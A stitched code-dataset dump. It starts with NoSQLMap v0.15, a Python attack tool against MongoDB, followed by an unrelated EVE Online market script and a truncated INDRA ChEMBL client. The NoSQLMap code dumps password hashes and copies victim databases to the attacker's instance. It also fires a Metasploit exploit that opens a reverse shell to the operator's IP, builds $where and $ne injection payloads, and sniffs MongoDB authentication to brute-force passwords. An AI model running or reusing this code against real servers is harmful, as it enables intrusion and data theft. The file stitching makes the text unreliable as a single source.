#You should have received a copy of the GNU General Public License
#along with this program. If not, see <http://www.gnu.org/licenses/>.
####_sniff_and_brute_####
from scapy.all import *
import re
import hashlib
md5 = hashlib.md5
##############
import sys
import string
import random
import os
import time
import httplib2
import urllib
import pymongo
import subprocess
#Set a list so we can track whether options are set or not to avoid resetting them in subsequent cals to the options menu.
global optionSet
optionSet = [False,False,False,False,False,False]
def mainMenu():
select = True
while select:
os.system('clear')
#label = subprocess.check_output(["git","describe","--always"])
print "NoSQLMap-v0.15"
print "[email protected]"
print "\n"
print "1-Set options (do this first)"
print "2-NoSQL DB Access Attacks"
print "3-NoSQL Web App attacks"
print "4-NoSQL MongoDB sniff and brute password"
print "99-Exit"
select = raw_input("Select an option:")
if select == "1":
options()
##
if select == "4":
sniff_and_brute()
##
elif select == "2":
if optionSet[0] == True:
netAttacks(victim)
#Check minimum required options
else:
raw_input("Target not set! Check options. Press enter to continue...")
mainMenu()
elif select == "3":
#Check minimum required options
if (optionSet[0] == True) and (optionSet[2] == True):
webApps()
else:
raw_input("Options not set! Check Host and URI path. Press enter to continue...")
mainMenu()
elif select == "99":
sys.exit()
else:
raw_input("Invalid Selection. Press enter to continue.")
mainMenu()
def options():
global victim
global webPort
global uri
global httpMethod
global myIP
global myPort
#Set default value if needed
if optionSet[0] == False:
victim = "Not Set"
if optionSet[1] == False:
webPort = 80
optionSet[1] = True
if optionSet[2] == False:
uri = "Not Set"
if optionSet[3] == False:
httpMethod = "GET"
if optionSet[4] == False:
myIP = "Not Set"
if optionSet[5] == False:
myPort = "Not Set"
select = True
while select:
print "\n\n"
print "Options"
print "1-Set target host/IP (Current: " + str(victim) + ")"
print "2-Set web app port (Current: " + str(webPort) + ")"
print "3-Set App Path (Current: " + str(uri) + ")"
print "4-Set HTTP Request Method (GET/POST)"
print "5-Set my local Mongo/Shell IP (Current: " + str(myIP) + ")"
print "6-Set shell listener port (Current: " + str(myPort) + ")"
print "7-Load options file"
print "8-Save options file"
print "9-Back to main menu"
select = raw_input("Select an option: ")
if select == "1":
victim = raw_input("Enter the host IP/DNS name: ")
print "\nTarget set to " + victim + "\n"
optionSet[0] = True
options()
elif select == "2":
webPort = raw_input("Enter the HTTP port for web apps: ")
print "\nHTTP port set to " + webPort + "\n"
optionSet[1] = True
options()
elif select == "3":
uri = raw_input("Enter URI Path (Press enter for no URI): ")
print "\nURI Path set to " + uri + "\n"
optionSet[2] = True
options()
#NOT IMPLEMENTED YET FOR USE
elif select == "4":
httpMethod = True
while httpMethod:
print "1-Send request as a GET"
print "2-Send request as a POST"
httpMethod = raw_input("Select an option: ")
if httpMethod == "1":
print "GET request set"
optionSet[3] = True
options()
elif httpMethod == "2":
print "POST request set"
optionSet[3] = True
options()
else:
print "Invalid selection"
elif select == "5":
myIP = raw_input("Enter host IP for my Mongo/Shells: ")
print "Shell IP set to " + myIP + "\n"
optionSet[4] = True
options()
elif select == "6":
myPort = raw_input("Enter TCP listener for shells: ")
print "Shell TCP listener set to " + myPort + "\n"
optionSet[5] = True
options()
elif select == "7":
loadPath = raw_input("Enter file name to load: ")
try:
fo = open(loadPath,"r" )
csvOpt = fo.read()
fo.close()
optList = csvOpt.split(",")
victim = optList[0]
webPort = optList[1]
uri = optList[2]
httpMethod = optList[3]
myIP = optList[4]
myPort = optList[5]
#Set option checking array based on what was loaded
x = 0
for item in optList:
if item != "Not Set":
optionSet[x] = True
x += 1
except:
print "Couldn't load options file!"
options()
elif select == "8":
savePath = raw_input("Enter file name to save: ")
try:
fo = open(savePath, "wb")
fo.write(str(victim) + "," + str(webPort) + "," + str(uri) + "," + str(httpMethod) + "," + str(myIP) + "," + str(myPort))
fo.close()
print "Options file saved!"
except:
print "Couldn't save options file."
elif select == "9":
mainMenu()
def netAttacks(target):
mgtOpen = False
webOpen = False
#This is a global for future use with other modules; may change
global dbList
srvNeedCreds = raw_input("Does the database server need credentials? ")
if srvNeedCreds == "n" or srvNeedCreds == "N":
try:
conn = pymongo.MongoClient(target,27017)
print "MongoDB port open on " + target + ":27017!"
mgtOpen = True
except:
print "MongoDB port closed."
elif srvNeedCreds == "y" or srvNeedCreds == "Y":
srvUser = raw_input("Enter server username: ")
srvPass = raw_input("Enter server password: ")
uri = "mongodb://" + srvUser + ":" + srvPass + "@" + victim +"/"
try:
conn = pymongo.MongoClient(uri)
print "MongoDB authenticated on " + target + ":27017!"
mgtOpen = True
except:
raw_input("Failed to authenticate. Press enter to continue...")
mainMenu()
mgtUrl = "http://" + target + ":28017"
#Future rev: Add web management interface parsing
try:
mgtRespCode = urllib.urlopen(mgtUrl).getcode()
if mgtRespCode == 200:
print "MongoDB web management open at " + mgtUrl + ". No authentication required!"
except:
print "MongoDB web management closed or requires authentication."
if mgtOpen == True:
#Ths is compiling server info?????
print "Server Info:"
serverInfo = conn.server_info()
print serverInfo
print "\n"
try:
print "List of databases:"
dbList = conn.database_names()
print "\n".join(dbList)
print "\n"
except:
print "Error: Couldn't list databases. The provided credentials may not have rights."
print "List of collections:"
#print "\n"
try:
for dbItem in dbList:
db = conn[dbItem]
colls = db.collection_names()
print dbItem + ":"
print "\n".join(colls)
if 'system.users' in colls:
users = list(db.system.users.find())
print "Database Users and Password Hashes:"
#print dbItem
print str(users)
#print "\n"
except:
print "Error: Couldn't list collections. The provided credentials may not have rights."
stealDB = raw_input("Steal a database? (Requires your own Mongo instance): ")
if stealDB == "y" or stealDB == "Y":
stealDBs (myIP)
getShell = raw_input("Try to get a shell? (Requrires mongoDB <2.2.4)?")
if getShell == "y" or getShell == "Y":
#Launch Metasploit exploit
try:
proc = subprocess.call("msfcli exploit/linux/misc/mongod_native_helper RHOST=" + str(victim) +" DB=local PAYLOAD=linux/x86/shell/reverse_tcp LHOST=" + str(myIP) + " LPORT="+ str(myPort) + " E", shell=True)
except:
print "Something went wrong. Make sure Metasploit is installed and path is set, and all options are defined."
raw_input("Press enter to continue...")
return()
def webApps():
paramName = []
paramValue = []
vulnAddrs = []
possAddrs = []
appUp = False
strTbAttack = False
intTbAttack = False
#Verify app is working.
print "Checking to see if site at " + str(victim) + ":" + str(webPort) + str(uri) + " is up..."
appURL = "http://" + str(victim) + ":" + str(webPort) + str(uri)
try:
appRespCode = urllib.urlopen(appURL).getcode()
if appRespCode == 200:
normLength = int(len(urllib.urlopen(appURL).read()))
timeReq = urllib.urlopen(appURL)
start = time.time()
page = timeReq.read()
end = time.time()
timeReq.close()
timeBase = round((end - start), 3)
print "App is up! Got response length of " + str(normLength) + " and response time of " + str(timeBase) + " seconds. Starting injection test.\n"
appUp = True
else:
print "Got " + appRespCode + "from the app, check your options."
except:
print "Looks like the server didn't respond. Check your options."
if appUp == True:
injectSize = raw_input("Baseline test-Enter random string size: ")
injectString = randInjString(int(injectSize))
print "Using " + injectString + " for injection testing.\n"
#Build a random string and insert; if the app handles input correctly, a random string and injected code should be treated the same.
#Add error handling for Non-200 HTTP response codes if random strings freaks out the app.
randomUri = buildUri(appURL,injectString)
print "Checking random injected parameter HTTP response size using " + randomUri +"...\n"
randLength = int(len(urllib.urlopen(randomUri).read()))
print "Got response length of " + str(randLength) + "."
randNormDelta = abs(normLength - randLength)
if randNormDelta == 0:
print "No change in response size injecting a random parameter..\n"
else:
print "HTTP response varied " + str(randNormDelta) + " bytes with random parameter value!\n"
print "Testing Mongo PHP not equals associative array injection using " + neqUri +"..."
injLen = int(len(urllib.urlopen(neqUri).read()))
print "Got response length of " + str(injLen) + "."
randInjDelta = abs(injLen - randLength)
if (randInjDelta >= 100) and (injLen != 0) :
print "Not equals injection response varied " + str(randInjDelta) + " bytes from random parameter value! Injection works!"
vulnAddrs.append(neqUri)
elif (randInjDelta > 0) and (randInjDelta < 100) and (injLen != 0) :
print "Response variance was only " + str(randInjDelta) + " bytes. Injection might have worked but difference is too small to be certain. "
possAddrs.append(neqUri)
elif (randInjDelta == 0):
print "Random string response size and not equals injection were the same. Injection did not work."
else:
print "Injected response was smaller than random response. Injection may have worked but requires verification."
possAddrs.append(neqUri)
print "Testing Mongo <2.4 $where all Javascript string escape attack for all records...\n"
print "Injecting " + whereStrUri
whereStrLen = int(len(urllib.urlopen(whereStrUri).read()))
whereStrDelta = abs(whereStrLen - randLength)
if (whereStrDelta >= 100) and (whereStrLen > 0):
print "Java $where escape varied " + str(whereStrDelta) + " bytes from random parameter value! Where injection works!"
vulnAddrs.append(whereStrUri)
elif (whereStrDelta > 0) and (whereStrDelta < 100) and (whereStrLen - randLength > 0):
print " response variance was only " + str(whereStrDelta) + "bytes. Injection might have worked but difference is too small to be certain."
possAddrs.append(whereStrUri)
elif (whereStrDelta == 0):
print "Random string response size and $where injection were the same. Injection did not work."
else:
print "Injected response was smaller than random response. Injection may have worked but requires verification."
possAddrs.append(whereStrUri)
print "\n"
print "Testing Mongo <2.4 $where Javascript integer escape attack for all records...\n"
print "Injecting " + whereIntUri
whereIntLen = int(len(urllib.urlopen(whereIntUri).read()))
whereIntDelta = abs(whereIntLen - randLength)
if (whereIntDelta >= 100) and (whereIntLen - randLength > 0):
print "Java $where escape varied " + str(whereIntDelta) + " bytes from random parameter! Where injection works!"
vulnAddrs.append(whereIntUri)
elif (whereIntDelta > 0) and (whereIntDelta < 100) and (whereIntLen - randLength > 0):
print " response variance was only " + str(whereIntDelta) + "bytes. Injection might have worked but difference is too small to be certain."
possAddrs.append(whereIntUri)
elif (whereIntDelta == 0):
print "Random string response size and $where injection were the same. Injection did not work."
else:
print "Injected response was smaller than random response. Injection may have worked but requires verification."
possAddrs.append(whereIntUri)
#Start a single record attack in case the app expects only one record back
print "Testing Mongo <2.4 $where all Javascript string escape attack for one record...\n"
print " Injecting " + whereOneStr
whereOneStrLen = int(len(urllib.urlopen(whereOneStr).read()))
whereOneStrDelta = abs(whereOneStrLen - randLength)
if (whereOneStrDelta >= 100) and (whereOneStrLen - randLength > 0):
print "Java $where escape varied " + str(whereOneStrDelta) + " bytes from random parameter value! Where injection works!"
vulnAddrs.append(whereOneStr)
elif (whereOneStrDelta > 0) and (whereOneStrDelta < 100) and (whereOneStrLen - randLength > 0):
print " response variance was only " + str(whereOneStrDelta) + "bytes. Injection might have worked but difference is too small to be certain."
possAddrs.append(whereOneStr)
elif (whereOneStrDelta == 0):
print "Random string response size and $where single injection were the same. Injection did not work."
else:
print "Injected response was smaller than random response. Injection may have worked but requires verification."
possAddrs.append(whereOneStr)
print "\n"
print "Testing Mongo <2.4 $where Javascript integer escape attack for one record...\n"
print " Injecting " + whereOneInt
whereOneIntLen = int(len(urllib.urlopen(whereOneInt).read()))
whereOneIntDelta = abs(whereOneIntLen - randLength)
if (whereOneIntDelta >= 100) and (whereOneIntLen - randLength > 0):
print "Java $where escape varied " + str(whereOneIntDelta) + " bytes from random parameter! Where injection works!"
vulnAddrs.append(whereOneInt)
elif (whereOneIntDelta > 0) and (whereOneIntDelta < 100) and (whereOneIntLen - randLength > 0):
print " response variance was only " + str(whereOneIntDelta) + "bytes. Injection might have worked but difference is too small to be certain."
possAddrs.append(whereOneInt)
elif (whereOneIntDelta == 0):
print "Random string response size and $where single record injection were the same. Injection did not work."
else:
print "Injected response was smaller than random response. Injection may have worked but requires verification."
possAddrs.append(whereOneInt)
print "\n"
print "Testing Mongo this not equals string escape attack for all records..."
print " Injecting " + strThisNeqUri
whereThisStrLen = int(len(urllib.urlopen(strThisNeqUri).read()))
whereThisStrDelta = abs(whereThisStrLen - randLength)
if (whereThisStrDelta >= 100) and (whereThisStrLen - randLength > 0):
print "Java this not equals varied " + str(whereThisStrDelta) + " bytes from random parameter! Where injection works!"
vulnAddrs.append(strThisNeqUri)
elif (whereThisStrDelta > 0) and (whereThisStrDelta < 100) and (whereThisStrLen - randLength > 0):
print " response variance was only " + str(whereThisStrDelta) + "bytes. Injection might have worked but difference is too small to be certain."
possAddrs.append(strThisNeqUri)
elif (WhereThisStrDelta == 0):
print "Random string response size and this return response size were the same. Injection did not work."
else:
print "Injected response was smaller than random response. Injection may have worked but requires verification."
possAddrs.append(strThisNeqUri)
print "\n"
print "Testing Mongo this not equals integer escape attack for all records..."
print " Injecting " + intThisNeqUri
whereThisIntLen = int(len(urllib.urlopen(intThisNeqUri).read()))
whereThisIntDelta = abs(whereThisIntLen - randLength)
if (whereThisIntDelta >= 100) and (whereThisIntLen - randLength > 0):
print "Java this not equals varied " + str(whereThisStrDelta) + " bytes from random parameter! Where injection works!"
vulnAddrs.append(intThisNeqUri)
elif (whereThisIntDelta > 0) and (whereThisIntDelta < 100) and (whereThisIntLen - randLength > 0):
print " response variance was only " + str(whereThisIntDelta) + "bytes. Injection might have worked but difference is too small to be certain."
possAddrs.append(intThisNeqUri)
elif (whereThisIntDelta == 0):
print "Random string response size and this return response size were the same. Injection did not work."
else:
print "Injected response was smaller than random response. Injection may have worked but requires verification."
possAddrs.append(intThisNeqUri)
doTimeAttack = raw_input("Start timing based tests?")
if doTimeAttack == "y" or doTimeAttack == "Y":
print "Starting Javascript string escape time based injection..."
start = time.time()
strTimeInj = urllib.urlopen(timeStrUri)
page = strTimeInj.read()
end = time.time()
strTimeInj.close()
#print str(end)
#print str(start)
strTimeDelta = (int(round((end - start), 3)) - timeBase)
#print str(strTimeDelta)
if strTimeDelta > 25:
print "HTTP load time variance was " + str(strTimeDelta) +" seconds! Injection possible."
strTbAttack = True
else:
print "HTTP load time variance was only " + str(strTimeDelta) + ". Injection probably didn't work."
strTbAttack = False
print "Starting Javascript integer escape time based injection..."
start = time.time()
intTimeInj = urllib.urlopen(timeIntUri)
page = intTimeInj.read()
end = time.time()
intTimeInj.close()
#print str(end)
#print str(start)
intTimeDelta = (int(round((end - start), 3)) - timeBase)
#print str(strTimeDelta)
if intTimeDelta > 25:
print "HTTP load time variance was " + str(intTimeDelta) +" seconds! Injection possible."
intTbAttack = True
else:
print "HTTP load time variance was only " + str(intTimeDelta) + "seconds. Injection probably didn't work."
intTbAttack = False
print "\n"
print "Vunerable URLs:"
print "\n".join(vulnAddrs)
print "\n"
print "Possibly vulnerable URLs:"
print"\n".join(possAddrs)
print "\n"
print "Timing based attacks:"
if strTbAttack == True:
print "String attack-Successful"
else:
print "String attack-Unsuccessful"
if intTbAttack == True:
print "Integer attack-Successful"
else:
print "Integer attack-Unsuccessful"
fileOut = raw_input("Save results to file?")
if fileOut == "y" or fileOut == "Y":
savePath = raw_input("Enter output file name: ")
fo = open(savePath, "wb")
fo.write ("Vulnerable URLs:\n")
fo.write("\n".join(vulnAddrs))
fo.write("\n\n")
fo.write("Possibly Vulnerable URLs:\n")
fo.write("\n".join(possAddrs))
fo.write("\n")
fo.write("Timing based attacks:\n")
if strTbAttack == True:
fo.write("String Attack-Successful\n")
else:
fo.write("String Attack-Unsuccessful\n")
fo.write("\n")
if intTbAttack == True:
fo.write("Integer attack-Successful\n")
else:
fo.write("Integer attack-Unsuccessful\n")
fo.write("\n")
fo.close()
raw_input("Press enter to continue...")
return()
def randInjString(size):
print "What format should the random string take?"
print "1-Alphanumeric"
print "2-Letters only"
print "3-Numbers only"
print "4-Email address"
format = raw_input("Select an option: ")
if format == "1":
chars = string.ascii_letters + string.digits
return ''.join(random.choice(chars) for x in range(size))
elif format == "2":
chars = string.ascii_letters
return ''.join(random.choice(chars) for x in range(size))
elif format == "3":
chars = string.digits
return ''.join(random.choice(chars) for x in range(size))
elif format == "4":
chars = string.ascii_letters + string.digits
return ''.join(random.choice(chars) for x in range(size)) + '@' + ''.join(random.choice(chars) for x in range(size)) + '.com'
def buildUri(origUri, randValue):
paramName = []
paramValue = []
global neqUri
global whereStrUri
global whereIntUri
global whereOneStr
global whereOneInt
global timeStrUri
global timeIntUri
global strThisNeqUri
global intThisNeqUri
injOpt = ""
#Split the string between the path and parameters, and then split each parameter
split_uri = origUri.split("?")
params = split_uri[1].split("&")
for item in params:
index = item.find("=")
paramName.append(item[0:index])
paramValue.append(item[index + 1:len(item)])
menuItem = 1
print "List of parameters:"
for params in paramName:
print str(menuItem) + "-" + params
menuItem += 1
try:
injIndex = raw_input("Which parameter should we inject? ")
injOpt = str(paramName[int(injIndex)-1])
print "Injecting the " + injOpt + " parameter..."
except:
raw_input("Something went wrong. Press enter to return to the main menu...")
mainMenu()
evilUri = split_uri[0] + "?"
neqUri = split_uri[0] + "?"
whereStrUri = split_uri[0] + "?"
whereIntUri = split_uri[0] + "?"
whereOneStr = split_uri[0] + "?"
whereOneInt = split_uri[0] + "?"
timeStrUri = split_uri[0] + "?"
timeIntUri = split_uri[0] + "?"
strThisNeqUri = split_uri[0] + "?"
intThisNeqUri = split_uri[0] + "?"
x = 0
for item in paramName:
if paramName[x] == injOpt:
evilUri += paramName[x] + "=" + randValue + "&"
neqUri += paramName[x] + "[$ne]=" + randValue + "&"
whereStrUri += paramName[x] + "=a'; return db.a.find(); var dummy='!" + "&"
whereIntUri += paramName[x] + "=1; return db.a.find(); var dummy=1" + "&"
whereOneStr += paramName[x] + "=a'; return db.a.findOne(); var dummy='!" + "&"
whereOneInt += paramName[x] + "=a; return db.a.findOne(); var dummy=1" + "&"
timeStrUri += paramName[x] + "=a'; var date = new Date(); var curDate = null; do { curDate = new Date(); } while((Math.abs(date.getTime()-curDate.getTime()))/1000 < 10); return; var dummy='!" + "&"
timeIntUri += paramName[x] + "=1; var date = new Date(); var curDate = null; do { curDate = new Date(); } while((Math.abs(date.getTime()-curDate.getTime()))/1000 < 10); return; var dummy=1" + "&"
strThisNeqUri += paramName[x] + "=a'; return this.a != '" + randValue + "'; var dummy='!" + "&"
intThisNeqUri += paramName[x] + "=1; return this.a !=" + randValue + "; var dummy=1" + "&"
else:
evilUri += paramName[x] + "=" + paramValue[x] + "&"
neqUri += paramName[x] + "=" + paramValue[x] + "&"
whereStrUri += paramName[x] + "=" + paramValue[x] + "&"
whereIntUri += paramName[x] + "=" + paramValue[x] + "&"
whereOneStr += paramName[x] + "=" + paramValue[x] + "&"
whereOneInt += paramName[x] + "=" + paramValue[x] + "&"
timeStrUri += paramName[x] + "=" + paramValue[x] + "&"
timeIntUri += paramName[x] + "=" + paramValue[x] + "&"
strThisNeqUri += paramName[x] + "=" + paramValue[x] + "&"
intThisNeqUri += paramName[x] + "=" + paramValue[x] + "&"
x += 1
#Clip the extra & off the end of the URL
evilUri = evilUri[:-1]
neqUri = neqUri[:-1]
whereStrUri = whereStrUri[:-1]
whereIntUri = whereIntUri[:-1]
whereOneStr = whereOneStr[:-1]
whereOneInt = whereOneInt[:-1]
timeStrUri = timeStrUri[:-1]
timeIntUri = timeIntUri[:-1]
return evilUri
def stealDBs(myDB):
menuItem = 1
for dbName in dbList:
print str(menuItem) + "-" + dbName
menuItem += 1
try:
dbLoot = raw_input("Select a database to steal:")
except:
print "Invalid selection."
stealDBs(myDB)
try:
#Mongo can only pull, not push, connect to my instance and pull from verified open remote instance.
dbNeedCreds = raw_input("Does this database require credentials? ")
if dbNeedCreds == "n" or dbNeedCreds == "N":
myDBConn = pymongo.MongoClient(myDB,27017)
myDBConn.copy_database(dbList[int(dbLoot)-1],dbList[int(dbLoot)-1] + "_stolen",victim)
elif dbNeedCreds == "y" or dbNeedCreds == "Y":
dbUser = raw_input("Enter database username: ")
dbPass = raw_input("Enter database password: ")
myDBConn.copy_database(dbList[int(dbLoot)-1],dbList[int(dbLoot)-1] + "_stolen",victim,dbUser,dbPass)
else:
raw_input("Invalid Selection. Press enter to continue.")
stealDBs(myDB)
cloneAnother = raw_input("Database cloned. Copy another?")
if cloneAnother == "y" or cloneAnother == "Y":
stealDBs(myDB)
else:
return()
except:
raw_input ("Something went wrong. Are you sure your MongoDB is running and options are set? Press enter to return...")
mainMenu()
####__sniff_and_brute__####
###cyber-punk###
def sniff_and_brute():
class sniff_and_brute(object):
def get_packets(self, port, iface, count):
packets = sniff(filter="port "+str(port)+"", count=count, iface=str(iface))
return packets
def parse_packets(self, port, iface, count):
print "Sniff packages..."
packets = self.get_packets(port, iface, count)
print "Parse packages..."
for i in xrange(len(packets)):
if "key" in re.findall(r'[A-Za-z0-9]{3,}', str(packets[i])):
packet=packets[i]
break
user = re.findall(r'[A-Za-z0-9]{3,}', str(packet))[4]
nonce = re.findall(r'[A-Za-z0-9]{3,}', str(packet))[6]
key = re.findall(r'[A-Za-z0-9]{3,}', str(packet))[8]
return user, nonce, key
def gen_pass(self, user, nonce, passw):
return md5(nonce + user + md5(user + ":mongo:" + str(passw)).hexdigest()).hexdigest();
def brute_pass(self, port, iface, dictionary):
count = 10 # count of packets which should be sniffed
nonce, user, key = self.parse_packets(str(port), str(iface), int(count))
print "Prepair to brute..."
file = open(dictionary)
file_len = open(dictionary)
for i in xrange(len(file_len.readlines())):
passw = file.readline().split('\n')[0]
if self.gen_pass(user, nonce, passw) == key:
raw_input("\nFound - "+user+":"+passw)
break
exit
def test(self):
self.test1("string")
def test1(self, string):
self.string = string
print string
print "\nSniff and brute mongo password."
start = raw_input("Prepare to start (Y/N)? ")
if start == "y" or start == "Y":
next = raw_input("Port (default 27017): ")
if type(next) != int:
port = 27017
else:
port = next
next = raw_input("Interface to sniff: ")
if type(next) != str:
print "Error!"
exit
else:
iface=next
next= raw_input("Full path to dictionary for brute: ")
if type(next) != str:
print "Error!"
exit
else:
dictionary = next
else:
exit
start = raw_input("Start? (Y/N)")
if start == "y" or start == "Y":
sniff_brute = sniff_and_brute()
sniff_brute.brute_pass(port, iface, dictionary)
################
mainMenu()
| gpl-3.0 | 6,197,109,014,494,695,000 | 30.821223 | 209 | 0.662837 | false |
Snflow/market | market.py | 1 | 5924 | import urllib
import simplejson
import xlwt
import sys
import getopt
import os.path
from pprint import pprint
def get_price(typeID=34, scale='regionlimit', scaleID=10000043):
# Generate api address on eve-central
api_address = "http://api.eve-central.com/api/marketstat/json?typeid="+str(typeID)+"&"+scale+"="+str(scaleID)
# Receive raw market JSON strings.
market_file = urllib.urlopen(api_address)
market_json = market_file.read()
market_file.close()
if market_json=='A non-marketable type was given':
# Non-marketable item
return(0.0, 0.0)
# Un-serialize the JSON data to a Python dict.
market_data = simplejson.loads(market_json)
# Get buy and sell prices.
buy_price = market_data[0]["buy"]["max"]
sell_price = market_data[0]["sell"]["min"]
return(buy_price, sell_price)
def get_history(typeID=34, regionID=10000043, days=10):
api_address = "http://api.eve-marketdata.com/api/item_history2.json?char_name=market®ion_ids="+str(regionID)+"&type_ids="+str(typeID)+"&days="+str(days)
history_file = urllib.urlopen(api_address)
history_json = history_file.read()
history_file.close()
history_data = simplejson.loads(history_json)
total_volume = 0
n_days = 0
for single_day in history_data["emd"]["result"]:
total_volume = total_volume + int(single_day["row"]["volume"])
n_days = n_days + 1
avg_volume = total_volume/max(1,n_days)
if n_days == 0:
avg_volume = 0
return avg_volume
def broker_tax(buy_price, sell_price):
# Broker fee ratio, affected by both skill and standings.
broker_ratio = 0.0075
# Tax ratio, only affected by skill.
tax_ratio = 0.0075
# Broker fees for buy and sell.
broker_buy = broker_ratio*buy_price
broker_sell = broker_ratio*sell_price
broker = broker_buy + broker_sell
# Tax for sell.
tax = tax_ratio*sell_price
return(broker, tax)
def unit_profit(buy_price, sell_price):
non_zero = 0.0000001
(broker, tax) = broker_tax(buy_price, sell_price)
profit = sell_price - buy_price - broker - tax
profit_ratio = profit/(buy_price+non_zero)
return (profit, profit_ratio)
def read_data():
if not os.path.isfile('data'):
import typeID
file = open('data')
type_json = simplejson.load(file)
file.close()
return type_json
def main(argv):
regionID = 10000043
systemID = 30002187
ID = 34
volume_threshold = 100
days = 10
region_flag = False
system_flag = False
item_flag = False
try:
opts, args = getopt.getopt(argv,"r:v:s:d:i:", ["region=","volume=","system=","days=","item="])
except getopt.GetoptError:
print 'python market.py -r <regionID> -v <volume_threshold> -s <systemID> -d <days_for_volume> -i <item>'
sys.exit(2)
for opt,arg in opts:
if opt in ("-r", "--region"):
regionID = arg
region_flag = True
elif opt in ("-v", "--volume"):
volume_threshold = int(arg)
elif opt in ("-s", "--system"):
systemID = arg
system_flag = True
elif opt in ("-d", "--days"):
days = int(arg)
elif opt in ("-i", "--item"):
ID = arg
item_flag = True
if (system_flag == True and region_flag == False):
print "Must specify the region ID which contains the system:", systemID
exit()
print "EVE Market Analyzer is generating the marketing data for:"
print " Region:", regionID
if system_flag == True:
print " System:", systemID
outfile = "system_"+str(systemID)+"&volume_"+str(volume_threshold)+"&days_"+str(days)+".xls"
else:
outfile = "region_"+str(regionID)+"&volume_"+str(volume_threshold)+"&days_"+str(days)+".xls"
print " The minimal average volume requirement in the past", days,"days is:", volume_threshold
type_json = read_data()
book = xlwt.Workbook(encoding="utf-8")
sh = book.add_sheet("profit")
sh.write(0,0,"Item")
sh.write(0,1,"Type ID")
sh.write(0,2,"Buy Price")
sh.write(0,3,"Sell Price")
sh.write(0,4,"Profit per Order")
sh.write(0,5,"Average Volume")
sh.write(0,6,"Total Profit Available")
sh.write(0,7,"Profit Rate")
price_style = xlwt.XFStyle()
price_style.num_format_str = '#,##0.00'
num_style = xlwt.XFStyle()
num_style.num_format_str = '#,##0'
percentage_style = xlwt.XFStyle()
percentage_style.num_format_str = '0.00%'
sh.col(0).width = 256*20
sh.col(1).width = 256*7
sh.col(4).width = 256*16
sh.col(5).width = 256*16
sh.col(6).width = 256*22
i = 0
j = 1
while type_json[i]["ID"] != 'end':
ID = type_json[i]["ID"]
name = type_json[i]["name"]
if system_flag:
(buy_price, sell_price) = get_price(typeID=ID, scale='usesystem', scaleID=systemID)
else:
(buy_price, sell_price) = get_price(typeID=ID, scaleID=regionID)
if (buy_price != 0 and sell_price != 0):
(profit, profit_ratio) = unit_profit(buy_price, sell_price)
avg_volume = get_history(typeID=ID, regionID=regionID, days=days)
if avg_volume >= volume_threshold :
profit_total = avg_volume * profit
sh.write(j,0,name)
sh.write(j,1,ID)
sh.write(j,2,buy_price,price_style)
sh.write(j,3,sell_price,price_style)
sh.write(j,4,profit,price_style)
sh.write(j,5,avg_volume,num_style)
sh.write(j,6,profit_total,price_style)
sh.write(j,7,profit_ratio,percentage_style)
# print "Type ID:", ID, ", Item:", name
j = j+1
i = i+1
print "Type ID:", ID, ", Item:", name
book.save(outfile)
if __name__ == '__main__':
main(sys.argv[1:])
| mit | 3,605,402,687,740,820,500 | 32.468927 | 159 | 0.591492 | false |
pvtodorov/indra | indra/databases/chembl_client.py | 2 | 10360 | from __future__ import absolute_import, print_function, unicode_literals
from builtins import dict, str
import logging
import requests
from sympy.physics import units
from indra.databases import chebi_client, uniprot_client
from indra.statements import Inhibition, Agent, Evidence
from collections import defaultdict
logger = logging.getLogger(__name__)
def get_inhibition(drug, target):
chebi_id = drug.db_refs.get('CHEBI')
mesh_id = drug.db_refs.get('MESH')
if chebi_id:
drug_chembl_id = chebi_client.get_chembl_id(chebi_id)
elif mesh_id:
drug_chembl_id = get_chembl_id(mesh_id)
else:
logger.error('Drug missing ChEBI or MESH grounding.')
return None
target_upid = target.db_refs.get('UP')
if not target_upid:
logger.error('Target missing UniProt grounding.')
return None
target_chembl_id = get_target_chemblid(target_upid)
logger.info('Drug: %s, Target: %s' % (drug_chembl_id, target_chembl_id))
query_dict = {'query': 'activity',
'params': {'molecule_chembl_id': drug_chembl_id,
'target_chembl_id': target_chembl_id,
'limit': 10000}}
res = send_query(query_dict)
evidence = []
for assay in res['activities']:
ev = get_evidence(assay)
if not ev:
continue
evidence.append(ev)
st = Inhibition(drug, target, evidence=evidence)
return st
def get_drug_inhibition_stmts(drug):
"""Query ChEMBL for kinetics data given drug as Agent get back statements
Parameters
----------
drug : Agent
Agent representing drug with MESH or CHEBI grounding
Returns
-------
stmts : list of INDRA statements
INDRA statements generated by querying ChEMBL for all kinetics data of
a drug interacting with protein targets
"""
chebi_id = drug.db_refs.get('CHEBI')
mesh_id = drug.db_refs.get('MESH')
if chebi_id:
drug_chembl_id = chebi_client.get_chembl_id(chebi_id)
elif mesh_id:
drug_chembl_id = get_chembl_id(mesh_id)
else:
logger.error('Drug missing ChEBI or MESH grounding.')
return None
logger.info('Drug: %s' % (drug_chembl_id))
query_dict = {'query': 'activity',
'params': {'molecule_chembl_id': drug_chembl_id,
'limit': 10000}
}
res = send_query(query_dict)
activities = res['activities']
targ_act_dict = activities_by_target(activities)
target_chembl_ids = [x for x in targ_act_dict]
protein_targets = get_protein_targets_only(target_chembl_ids)
filtered_targ_act_dict = {t: targ_act_dict[t]
for t in [x for x in protein_targets]}
stmts = []
for target_chembl_id in filtered_targ_act_dict:
target_activity_ids = filtered_targ_act_dict[target_chembl_id]
target_activites = [x for x in activities
if x['activity_id'] in target_activity_ids]
target_upids = []
targ_comp = protein_targets[target_chembl_id]['target_components']
for t_c in targ_comp:
target_upids.append(t_c['accession'])
evidence = []
for assay in target_activites:
ev = get_evidence(assay)
if not ev:
continue
evidence.append(ev)
if len(evidence) > 0:
for target_upid in target_upids:
agent_name = uniprot_client.get_gene_name(target_upid)
target_agent = Agent(agent_name, db_refs={'UP': target_upid})
st = Inhibition(drug, target_agent, evidence=evidence)
stmts.append(st)
return stmts
def send_query(query_dict):
"""Query ChEMBL API
Parameters
----------
query_dict : dict
'query' : string of the endpoint to query
'params' : dict of params for the query
Returns
-------
js : dict
dict parsed from json that is unique to the submitted query
"""
query = query_dict['query']
params = query_dict['params']
url = 'https://www.ebi.ac.uk/chembl/api/data/' + query + '.json'
r = requests.get(url, params=params)
r.raise_for_status()
js = r.json()
return js
def query_target(target_chembl_id):
"""Query ChEMBL API target by id
Parameters
----------
target_chembl_id : str
Returns
-------
target : dict
dict parsed from json that is unique for the target
"""
query_dict = {'query': 'target',
'params': {'target_chembl_id': target_chembl_id,
'limit': 1}}
res = send_query(query_dict)
target = res['targets'][0]
return target
def activities_by_target(activities):
"""Get back lists of activities in a dict keyed by ChEMBL target id
Parameters
----------
activities : list
